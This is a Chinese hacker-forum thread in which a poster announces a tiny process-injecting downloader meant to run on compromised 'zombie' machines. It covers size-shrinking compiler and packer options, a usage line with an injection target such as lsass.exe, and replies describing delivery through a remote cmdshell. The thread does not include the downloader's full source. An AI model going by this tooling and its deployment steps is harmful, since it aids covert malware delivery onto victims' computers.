文章作者：nop
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

那天看了来自轻院的狼[Immlep]写的远线程注入下载者(大小:1.87k 用MEW压缩过后的),只能注入svchost.exe,但是如果碰上box的主人比较BT,例如只使用代理上,典型如使用sock4/5 proxy+e-border,且只使用maxthon或者firefox之类浏览网页,那么即使注入svchost.exe或者iexplore.exe进程也无法下载到我们想要的东西.
于是我动了写个能随意插入进程 下载者的念头,费了两晚写成. :-)
但一直不敢发布,是因为编译出来大小总是大于28k (这还是什么下载者 :-P)
后来调整了半天的编译参数,才找到比较优化的方法:
代码开始加入:
#pragma comment(lib,"msvcrt.lib")
#pragma comment(linker, "/align:16")
#pragma comment(linker, "/merge:.data=.text") //合并段
#pragma comment(linker, "/merge:.rdata=.text")

终于编译出3.45kb的版本,可是用WinUpack压缩后就没法子运行了(后来发现WinUpack只能压缩对齐是4096字节的PE文件,不知道这是不是WinUpack的bug? :-P)
然后用/merge:.data=.text /merge:.rdata=.text /align:4096编译,再用WinUpack压缩,遂成现在的2.48K版本.
使用方法:inject.exe URL(要有http://) Rename(必须有,下载到当前文件夹) 注入的进程名(默认是:svchost.exe)

第一次写WIN32程序,不足之处,还请大家指正,谢谢!


_.-=[ InjectDown v0.1 by NOP ]=-._
Usage:inject.exe [InjProc Def.:svchost.exe]
eg. inject.exe http://192.168.10.1/foo.txt nop.txt lsass.exe

不明白你这个下载者是怎么用的？ 这个不是生成器，在肉鸡上直接运行？

引用:

下面是引用bianfu于2005-12-20 00:41发表的:
不明白你这个下载者是怎么用的？ 这个不是生成器，在肉鸡上直接运行？

这个在cmdshell下面用的
先用echo+debug从shell里面写入injectdown再用

插入后如何清除啊？！
不知道如何清除。在本机测试的话，有点不好吧。
不好意思。因为之前也不知道“下载者”是怎么工作的。。

怎么没使用方法
[s:57]
这个在cmdshell下面用的
先用echo+debug从shell里面写入injectdown再用

还不能理解 [s:57]  [s:57]

只下载 不能自动运行? 没有服务端 直接运行的?
没什么实际大用途啊

复制内容到剪贴板

代码:

#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"shell32.lib")

#pragma comment(linker, "-entry:my_wmain")
#pragma comment(linker, "-opt:nowin98")
#pragma comment(linker, "-opt:ref")
#pragma comment(linker, "-merge:.rdata=.text")
#pragma comment(linker, "-subsystem:console")

int __stdcall real_wmain (int argc,WCHAR *argv[])
{
   printf("Success\n");
   return 0;
}

void __cdecl my_main (void)
{
    int argc=0;

    WCHAR **argv=CommandLineToArgvW(GetCommandLineW(),&argc);

    ExitProcess(real_wmain(argc,argv));
}

TFNURLDownloadToFile(GetProcAddress(HUrlMonLib, 'URLDownloadToFileA'))
我在138soft 上下载的1k下载者在编译的时候，delphi提示这句有错，我不明白，请高手指点一下！